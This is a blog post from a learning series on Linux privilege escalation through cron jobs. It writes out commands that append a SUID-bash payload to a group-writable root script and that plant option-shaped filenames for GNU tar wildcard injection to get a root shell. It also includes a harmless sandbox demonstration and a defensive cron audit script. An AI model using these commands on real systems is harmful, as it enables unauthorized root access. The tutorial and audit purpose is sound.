DEV Community

Devon Argent

Day 30: Wildcard Injection & Cron Jobs — The Automation Trap 🕵️‍♂️

🛠️ The "Automation-to-Root" Pipeline

1. Writable Cron Script (The Group Privilege Trap)

Sometimes a script isn't world-writable, but it is writable by a group you belong to.

  • The Scenario: A root cron job runs /usr/local/bin/backup.sh. The script is owned by root:dev with mode 774 (rwxrwxr--), so anyone in the dev group can modify it.
  • The Exploit: If id shows you in the dev group, append a payload that copies bash and sets the SUID bit: echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /usr/local/bin/backup.sh. Use >> rather than >, so the script keeps doing its job and nobody notices a broken backup.
  • The Result: The next time the job fires (how soon depends on its schedule, not a fixed minute), ls -l /tmp/rootbash shows a root-owned binary with the s bits set. Run it as /tmp/rootbash -p to get a root shell; without -p, bash notices that its effective UID differs from the real one and drops the privilege again.

2. Wildcard Injection (The "tar" Trick)

This is a classic OSCP-style exploit. If a root cron job runs:
cd /var/www/html && tar -czf /tmp/backup.tar.gz *
and /var/www/html/ is world-writable, the shell (not tar) expands the * into every filename in that directory and hands each one to tar as a separate argument. The cd matters: because the glob is a bare *, each expanded word is just the filename, so a file called --checkpoint=1 shows up in tar's argv looking exactly like an option. Had the job been written as tar -czf /tmp/backup.tar.gz /var/www/html/*, every word would begin with /var/www/html/ and tar would treat them all as paths.

  • The Injection: I created a payload and two files whose names tar reads as options:
    1. echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > /var/www/html/exploit.sh (the same payload as in section 1)
    2. touch /var/www/html/--checkpoint=1
    3. touch /var/www/html/--checkpoint-action=exec=sh\ exploit.sh
  • The Mechanism: GNU tar accepts options anywhere in argv, so it parses --checkpoint=1 and --checkpoint-action=exec=sh exploit.sh as flags rather than filenames. After the first archive record is written the checkpoint fires and tar runs sh -c 'sh exploit.sh' as root, with the working directory still /var/www/html, so exploit.sh is found and /tmp/rootbash appears. Only GNU tar implements --checkpoint-action; bsdtar and BusyBox tar reject it, so check tar --version before relying on this.
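Here is a sandboxed reproduction of the mechanism, added here as an example and not part of the original post. It plants the same two option-shaped filenames in a throw-away directory owned by the current user, runs the backup command the way the vulnerable cron line does, and also runs the two ways of writing the job that defeat the trick. No root and no cron are involved: the payload only drops a marker file, and the verdict tells you whether tar executed it. The helper names (tar_flavor, plant_injection, run_backup_job, wildcard_demo) are this example's own. It needs GNU tar; bsdtar and BusyBox tar reject --checkpoint-action, which the script reports as "other".

```shell
#!/bin/sh
# Added sandbox for the tar wildcard injection (example code, not the post's).
# Runs as an unprivileged user in a throw-away directory: the "payload" only
# creates a marker file, so the verdict shows whether tar executed it.

# Print "gnu" if the installed tar is GNU tar (the only one with
# --checkpoint-action), otherwise "other".
tar_flavor() {
    if tar --version 2>/dev/null | head -n 1 | grep -q 'GNU tar'; then
        echo gnu
    else
        echo other
    fi
}

# Plant the option-shaped filenames and the payload script in directory $1.
# On a real target exploit.sh would hold the SUID-copy payload from the post;
# here it just drops a marker so we can observe that it ran.
plant_injection() {
    d=$1
    printf 'touch "%s/PWNED"\n' "$d" > "$d/exploit.sh"
    touch "$d/--checkpoint=1"
    touch "$d/--checkpoint-action=exec=sh exploit.sh"
    echo '<html></html>' > "$d/index.html"   # ordinary content to back up
}

# Run the backup job against directory $1 in one of three styles:
#   bare      cd DIR && tar -czf OUT *        (the vulnerable cron line)
#   dashdash  cd DIR && tar -czf OUT -- *     ('--' ends option parsing)
#   absolute  tar -czf OUT DIR/*              (every word starts with '/')
# Prints "executed" if exploit.sh ran, otherwise "not-executed".
run_backup_job() {
    d=$1; style=$2
    out=$(mktemp)
    rm -f "$d/PWNED"
    unset POSIXLY_CORRECT    # make sure tar runs in its default argv-parsing mode
    case $style in
        bare)     (cd "$d" && tar -czf "$out" *)    2>/dev/null || : ;;
        dashdash) (cd "$d" && tar -czf "$out" -- *) 2>/dev/null || : ;;
        absolute) tar -czf "$out" "$d"/*            2>/dev/null || : ;;
        *) echo "unknown style: $style" >&2; rm -f "$out"; return 2 ;;
    esac
    rm -f "$out"
    if [ -e "$d/PWNED" ]; then echo executed; else echo not-executed; fi
}

# wildcard_demo STYLE: fresh sandbox, plant, run, clean up, print the verdict.
wildcard_demo() {
    d=$(mktemp -d)
    plant_injection "$d"
    run_backup_job "$d" "$1"
    rm -rf "$d"
}

echo "tar flavour: $(tar_flavor)"
for style in bare dashdash absolute; do
    printf '%-9s %s\n' "$style" "$(wildcard_demo "$style")"
done
```

With GNU tar the bare style reports "executed" and the other two "not-executed", which is the whole fix in one line: either terminate option parsing with -- or make the glob produce words that cannot start with a dash.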

🕵️‍♂️ The "Wildcard Hunt" Checklist

When auditing a new machine, I now specifically look for:

  1. Cron Jobs: Any command field in /etc/crontab, the drop-ins under /etc/cron.d/, and the scripts in /etc/cron.{hourly,daily,weekly,monthly} that contains a glob (*, ?). The asterisks in the five schedule columns are harmless; only the command part matters. While there, run ls -l on every script a root job calls and look for a group or world write bit, as in section 1.
  2. Utilities: tar (--checkpoint-action), rsync (-e, the remote-shell option), and 7z (@listfile) are high-priority targets for argument injection; chown and chmod take --reference=FILE and can be fed a planted filename the same way.
  3. Shared Folders: /var/www/html, /tmp, and /opt are common places where wildcards and world-writable (or group-writable) permissions meet. Check the directory itself with ls -ld: the attacker needs to create files in the directory the glob is evaluated in, so a read-only directory full of writable files is not enough.
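The following audit script, added here as an example and not from the post, turns the checklist above and the group-writable check from section 1 into something runnable. It parses lines in system-crontab format (five schedule fields or an @ shortcut, then user, then command), flags globs in the command field, flags tar, rsync and 7z, and reports whether any absolute path in the command points at a group- or world-writable file or directory. Every path is prefixed with a ROOT argument so it can be pointed at a mounted image or at the fixture it builds for itself: a fake root with a 774 backup.sh, a 777 webroot and a small crontab, all constructed for this example. The function names (mode_string, writability, audit_cron_file, make_fixture) are this example's own.

```shell
#!/bin/sh
# Added audit script for the "wildcard hunt" checklist (not from the post).
# Reads files in system-crontab format (m h dom mon dow user command, or
# @reboot user command) and prints one line per finding:
#   FILE:LINE WILDCARD <cmd>            a glob character in the command field
#   FILE:LINE UTILITY <name>            tar/rsync/7z, which accept option-shaped names
#   FILE:LINE GROUP-WRITABLE <path>     an absolute path in the command whose
#   FILE:LINE WORLD-WRITABLE <path>     file or directory is group/world writable
# ROOT is prepended to every path so the script can be run against a mounted
# image or the constructed fixture below; pass "" to audit the live host.

# 10-character mode string such as -rwxrwxr-- (same layout in GNU and BSD ls).
mode_string() { ls -ld "$1" | cut -c1-10; }

# Position 6 of the mode string is the group write bit, position 9 the
# world write bit. World-writable is reported in preference to group-writable.
writability() {
    m=$(mode_string "$1")
    case "$(printf %s "$m" | cut -c9)" in w) echo WORLD-WRITABLE; return ;; esac
    case "$(printf %s "$m" | cut -c6)" in w) echo GROUP-WRITABLE; return ;; esac
    echo ok
}

# audit_cron_file ROOT FILE
audit_cron_file() {
    root=$1; file=$2; n=0
    set -f   # the audit must not itself glob-expand the '*' it is hunting for
    while IFS= read -r line || [ -n "$line" ]; do
        n=$((n + 1))
        case $line in
            ''|'#'*|[A-Za-z_]*=*) continue ;;   # blank, comment, VAR=value
        esac
        set -- $line
        case $1 in
            @*) [ $# -ge 3 ] || continue; shift 2 ;;   # @reboot user command
            *)  [ $# -ge 7 ] || continue; shift 6 ;;   # m h dom mon dow user command
        esac
        cmd=$*
        case $cmd in *[*?]*) printf '%s:%d WILDCARD %s\n' "$file" "$n" "$cmd" ;; esac
        for tok in "$@"; do
            tok=${tok%;}
            case ${tok##*/} in
                tar|rsync|7z|7za) printf '%s:%d UTILITY %s\n' "$file" "$n" "${tok##*/}" ;;
            esac
            case $tok in
                /*) if [ -e "$root$tok" ]; then
                        w=$(writability "$root$tok")
                        [ "$w" = ok ] || printf '%s:%d %s %s\n' "$file" "$n" "$w" "$tok"
                    fi ;;
            esac
        done
    done < "$file"
    set +f
}

# Constructed fixture: a fake root holding the two scenarios from the post.
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/etc" "$root/usr/local/bin" "$root/var/www/html"
    printf '%s\n' '#!/bin/sh' 'tar -czf /tmp/www.tgz /var/www/html' > "$root/usr/local/bin/backup.sh"
    chmod 774 "$root/usr/local/bin/backup.sh"   # the root:dev 774 script
    printf '%s\n' '#!/bin/sh' 'echo rotate' > "$root/usr/local/bin/rotate.sh"
    chmod 755 "$root/usr/local/bin/rotate.sh"   # a correctly locked-down script
    chmod 777 "$root/var/www/html"              # world-writable webroot
    printf '%s\n' \
        'SHELL=/bin/sh' \
        'PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin' \
        '# m h dom mon dow user command' \
        '*/5 * * * *  root  /usr/local/bin/backup.sh' \
        '0 3 * * *    root  cd /var/www/html && tar -czf /tmp/backup.tar.gz *' \
        '30 4 * * *   root  /usr/local/bin/rotate.sh' \
        '@reboot      root  rsync -a /srv/data/ /mnt/backup/' \
        > "$root/etc/crontab"
    echo "$root"
}

# Usage: audit the fixture. On a live host run audit_cron_file "" /etc/crontab
# and then each file under /etc/cron.d/.
fixture=$(make_fixture)
audit_cron_file "$fixture" "$fixture/etc/crontab"
rm -rf "$fixture"
```

Against the fixture the report names backup.sh as group-writable, marks the tar line for its wildcard, its utility and its world-writable webroot, marks the rsync line for the utility only, and says nothing about rotate.sh; that last silence is the point of running it rather than eyeballing the crontab.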

Follow my journey: #1HourADayJourney
